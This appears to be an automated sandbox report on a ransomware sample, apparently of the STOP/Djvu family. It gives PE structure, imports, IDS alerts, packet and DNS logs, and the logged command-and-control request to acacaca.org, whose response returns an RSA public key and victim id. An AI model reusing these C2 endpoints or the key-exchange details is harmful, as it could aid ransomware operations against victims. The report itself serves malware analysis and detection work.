mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FF04CA872F6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FF04CA872F4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FF04CA872F7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FF04CA8DD1Fh
fstp st(0)
fld tbyte ptr [004024AAh]
ret
fstp st(0)
or cl, cl
je 00007FF04CA872FDh
fstp st(0)
fldpi
or ch, ch
je 00007FF04CA872F4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FF04CA872E9h
fchs
ret
fstp st(0)
jmp 00007FF04CA8DCF5h
fstp st(0)
mov cl, ch
jmp 00007FF04CA872F2h
call 00007FF04CA872BEh
jmp 00007FF04CA8DD00h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, 00FFFD30h

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa627c	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x212e000	0xd568	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3660	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa5d5e	0xa5e00	False	0.9465576723813113	data	7.947102009414188	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa7000	0x20861cc	0x3000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x212e000	0xd568	0xd600	False	0.663898218457944	data	6.505740612537396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x212e4e0	0xea8	data	Kannada	Kanada
RT_ICON	0x212f388	0x8a8	data	Kannada	Kanada
RT_ICON	0x212fc30	0x568	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x2130198	0x25a8	data	Kannada	Kanada
RT_ICON	0x2132740	0x10a8	data	Kannada	Kanada
RT_ICON	0x21337e8	0x988	data	Kannada	Kanada
RT_ICON	0x2134170	0x468	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x2134640	0xea8	data	Kannada	Kanada
RT_ICON	0x21354e8	0x8a8	data	Kannada	Kanada
RT_ICON	0x2135d90	0x6c8	data	Kannada	Kanada
RT_ICON	0x2136458	0x568	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x21369c0	0x25a8	data	Kannada	Kanada
RT_ICON	0x2138f68	0x10a8	data	Kannada	Kanada
RT_ICON	0x213a010	0x468	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_DIALOG	0x213a688	0x78	data
RT_STRING	0x213a700	0x67a	data	French	Switzerland
RT_STRING	0x213ad80	0x464	data	French	Switzerland
RT_STRING	0x213b1e8	0x37c	data	French	Switzerland
RT_GROUP_ICON	0x21345d8	0x68	data	Kannada	Kanada
RT_GROUP_ICON	0x213a478	0x68	data	Kannada	Kanada
RT_VERSION	0x213a4f0	0x194	data
None	0x213a4e0	0xa	data

Imports

DLL

Import

KERNEL32.dll

GetModuleFileNameA, FoldStringA, GetLocalTime, InterlockedDecrement, GetLocaleInfoA, InterlockedCompareExchange, _hwrite, CancelWaitableTimer, GetSystemDirectoryW, CreateEventW, ReadConsoleA, BuildCommDCBA, GetConsoleAliasExesLengthW, SetSystemTimeAdjustment, PeekConsoleInputW, EnumDateFormatsA, CreateFileW, RegisterWaitForSingleObjectEx, LoadLibraryW, VerifyVersionInfoW, WaitNamedPipeA, GetEnvironmentStrings, FindResourceExA, VirtualProtect, GetFirmwareEnvironmentVariableW, BeginUpdateResourceW, WriteConsoleA, EnumCalendarInfoExA, WriteConsoleW, DeleteFileW, FillConsoleOutputCharacterA, GetProcAddress, GetModuleHandleW, GetUserDefaultLCID, FindFirstChangeNotificationA, GetFileAttributesExA, GetCalendarInfoA, SetConsoleTitleA, GetBinaryTypeW, GlobalAlloc, GetComputerNameExA, FindNextFileA, OpenJobObjectA, HeapSize, _lclose, GetComputerNameW, TlsGetValue, SetCalendarInfoW, SetComputerNameA, CreateDirectoryExA, InitializeCriticalSectionAndSpinCount, GetVolumePathNameA, GetProcessHandleCount, GetThreadLocale, GetSystemDefaultLangID, GetCurrentProcess, LoadLibraryA, ReadFile, HeapFree, GetDiskFreeSpaceW, GetProcessHeap, RaiseException, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, HeapAlloc, GetLastError, IsProcessorFeaturePresent, DecodePointer, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CreateFileA, LCMapStringW, GetStringTypeW, HeapReAlloc, SetEndOfFile

USER32.dll

ClientToScreen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Kannada	Kanada
French	Switzerland

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.658.235.189.19249782802833438 08/05/22-11:22:58.893846	TCP	2833438	ETPRO TROJAN STOP Ransomware CnC Activity	49782	80	192.168.2.6	58.235.189.192
58.235.189.192192.168.2.680497822036335 08/05/22-11:22:59.718335	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49782	58.235.189.192	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:22:24.789663076 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:24.789700985 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:24.789793968 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:24.810440063 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:24.810472012 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:24.881397963 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:24.881567001 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.215430021 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.215456009 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:25.215862989 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:25.215915918 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.218583107 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.256067991 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:25.256150007 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:25.256160021 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.256205082 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.294338942 CEST	49766	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:25.294367075 CEST	443	49766	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.059195995 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.059235096 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.059319019 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.072351933 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.072374105 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.130428076 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.130525112 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.157011032 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.157057047 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.157977104 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.158041954 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.172683954 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.208256006 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.208374977 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:40.208456039 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.208482027 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.234972000 CEST	49767	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:40.235018969 CEST	443	49767	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.177596092 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.177664995 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.177802086 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.370039940 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.370089054 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.431323051 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.431483984 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.475049019 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.475132942 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.475707054 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.475769043 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.478137016 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.514411926 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.514501095 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.514533997 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.514559984 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:51.514595032 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.514609098 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.571310997 CEST	49768	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:51.571379900 CEST	443	49768	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.051544905 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.051599979 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.051711082 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.082473993 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.082509041 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.146112919 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.146187067 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.155904055 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.155931950 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.156208992 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.158427954 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.169518948 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.209821939 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.209902048 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.209938049 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.209965944 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.210902929 CEST	49780	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.210927963 CEST	443	49780	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.968879938 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.968966961 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:57.969082117 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.998213053 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:57.998248100 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.056582928 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.056663036 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.066802025 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.066828966 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.067101002 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.067362070 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.085259914 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.123703957 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.123825073 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.123934984 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.124691010 CEST	49781	443	192.168.2.6	162.0.217.254
Aug 5, 2022 11:22:58.124718904 CEST	443	49781	162.0.217.254	192.168.2.6
Aug 5, 2022 11:22:58.595031977 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:22:58.893264055 CEST	80	49782	58.235.189.192	192.168.2.6
Aug 5, 2022 11:22:58.893389940 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:22:58.893846035 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:22:59.392359972 CEST	80	49782	58.235.189.192	192.168.2.6
Aug 5, 2022 11:22:59.718334913 CEST	80	49782	58.235.189.192	192.168.2.6
Aug 5, 2022 11:22:59.718427896 CEST	80	49782	58.235.189.192	192.168.2.6
Aug 5, 2022 11:22:59.718431950 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:22:59.718482018 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:22:59.718523026 CEST	49782	80	192.168.2.6	58.235.189.192
Aug 5, 2022 11:23:00.016340971 CEST	80	49782	58.235.189.192	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:22:24.625781059 CEST	58723	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:24.648847103 CEST	53	58723	8.8.8.8	192.168.2.6
Aug 5, 2022 11:22:40.024580002 CEST	51971	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:40.047831059 CEST	53	51971	8.8.8.8	192.168.2.6
Aug 5, 2022 11:22:49.905822039 CEST	56591	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:49.928405046 CEST	53	56591	8.8.8.8	192.168.2.6
Aug 5, 2022 11:22:57.003020048 CEST	61607	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:57.026122093 CEST	53	61607	8.8.8.8	192.168.2.6
Aug 5, 2022 11:22:57.935260057 CEST	56550	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:57.954525948 CEST	53	56550	8.8.8.8	192.168.2.6
Aug 5, 2022 11:22:58.320210934 CEST	52858	53	192.168.2.6	8.8.8.8
Aug 5, 2022 11:22:58.592458963 CEST	53	52858	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 5, 2022 11:22:24.625781059 CEST	192.168.2.6	8.8.8.8	0x8137	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:40.024580002 CEST	192.168.2.6	8.8.8.8	0x6c68	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:49.905822039 CEST	192.168.2.6	8.8.8.8	0xdc30	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:57.003020048 CEST	192.168.2.6	8.8.8.8	0xc534	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:57.935260057 CEST	192.168.2.6	8.8.8.8	0xc62c	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.320210934 CEST	192.168.2.6	8.8.8.8	0x156b	Standard query (0)	acacaca.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 5, 2022 11:22:24.648847103 CEST	8.8.8.8	192.168.2.6	0x8137	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:40.047831059 CEST	8.8.8.8	192.168.2.6	0x6c68	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:49.928405046 CEST	8.8.8.8	192.168.2.6	0xdc30	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:57.026122093 CEST	8.8.8.8	192.168.2.6	0xc534	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:57.954525948 CEST	8.8.8.8	192.168.2.6	0xc62c	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	58.235.189.192	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	138.36.3.134	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	190.107.133.19	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	190.140.74.43	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	190.219.54.242	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	211.119.84.111	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	222.236.49.123	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	190.140.99.150	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	211.53.230.67	A (IP address)	IN (0x0001)
Aug 5, 2022 11:22:58.592458963 CEST	8.8.8.8	192.168.2.6	0x156b	No error (0)	acacaca.org	110.14.121.125	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.2ip.ua

acacaca.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49766	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49767	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49768	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49780	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49781	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49782	58.235.189.192	80	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 11:22:58.893846035 CEST	1226	OUT	GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: acacaca.org
Aug 5, 2022 11:22:59.718334913 CEST	1227	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 09:22:59 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 561 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 57 77 59 37 39 49 46 5a 48 5a 72 52 54 58 2b 76 4d 33 59 5c 5c 6e 38 76 4c 47 35 46 6e 78 30 34 52 64 52 6b 64 50 7a 66 6c 55 70 65 49 70 2b 51 63 69 42 4b 33 45 2b 39 56 54 71 57 52 4e 59 67 58 37 5a 58 7a 31 7a 51 31 61 38 52 59 79 5a 53 35 37 66 2b 47 37 5c 5c 6e 6f 35 6f 75 33 33 64 51 70 54 78 6a 78 61 6f 6b 56 4b 4d 78 53 47 44 52 37 47 37 74 32 46 2b 50 6a 57 47 74 63 48 57 66 75 5c 2f 51 45 6b 47 48 73 6e 63 4e 68 65 45 41 6b 79 36 7a 4c 69 6b 32 6f 5c 5c 6e 4d 31 6c 59 69 33 33 4c 55 45 38 61 41 4c 41 54 4f 63 64 59 42 35 51 68 4c 4a 64 31 53 63 73 4a 33 63 34 5c 2f 75 59 72 34 45 70 61 4d 53 6b 49 69 79 69 5c 2f 50 53 79 45 78 59 63 4b 75 42 39 63 47 5c 5c 6e 63 63 2b 38 49 50 51 76 33 44 5c 2f 4f 6a 42 48 70 72 41 56 4a 7a 31 69 2b 68 50 7a 6e 32 34 6d 61 51 37 37 72 36 30 6e 34 39 79 5c 2f 53 33 6b 50 68 35 38 55 37 42 52 47 61 71 77 6f 43 6a 2b 54 5a 5c 5c 6e 76 56 6c 2b 75 7a 62 2b 2b 69 6f 33 62 45 64 4c 2b 79 6e 4e 4f 50 50 7a 2b 5c 2f 46 4b 76 53 57 7a 4e 55 52 2b 75 52 2b 6a 51 72 4a 33 36 64 68 73 71 6e 54 73 74 6f 5c 2f 52 45 4c 4f 34 52 6a 35 68 5c 5c 6e 4b 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 30 6b 50 36 76 4f 6f 45 64 42 6d 39 70 32 49 54 48 53 33 70 70 67 38 35 69 52 42 52 4b 6e 45 64 74 71 66 4e 66 70 50 41 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0WwY79IFZHZrRTX+vM3Y\\n8vLG5Fnx04RdRkdPzflUpeIp+QciBK3E+9VTqWRNYgX7ZXz1zQ1a8RYyZS57f+G7\\no5ou33dQpTxjxaokVKMxSGDR7G7t2F+PjWGtcHWfu\/QEkGHsncNheEAky6zLik2o\\nM1lYi33LUE8aALATOcdYB5QhLJd1ScsJ3c4\/uYr4EpaMSkIiyi\/PSyExYcKuB9cG\\ncc+8IPQv3D\/OjBHprAVJz1i+hPzn24maQ77r60n49y\/S3kPh58U7BRGaqwoCj+TZ\\nvVl+uzb++io3bEdL+ynNOPPz+\/FKvSWzNUR+uR+jQrJ36dhsqnTsto\/RELO4Rj5h\\nKQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49766	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	Direction	Data
2022-08-05 09:22:25 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-08-05 09:22:25 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 05 Aug 2022 09:22:25 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-08-05 09:22:25 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49767	162.0.217.254	443	C:\Users\user\Desktop\bE5aaTiJM0.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:22:40 UTC	1	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
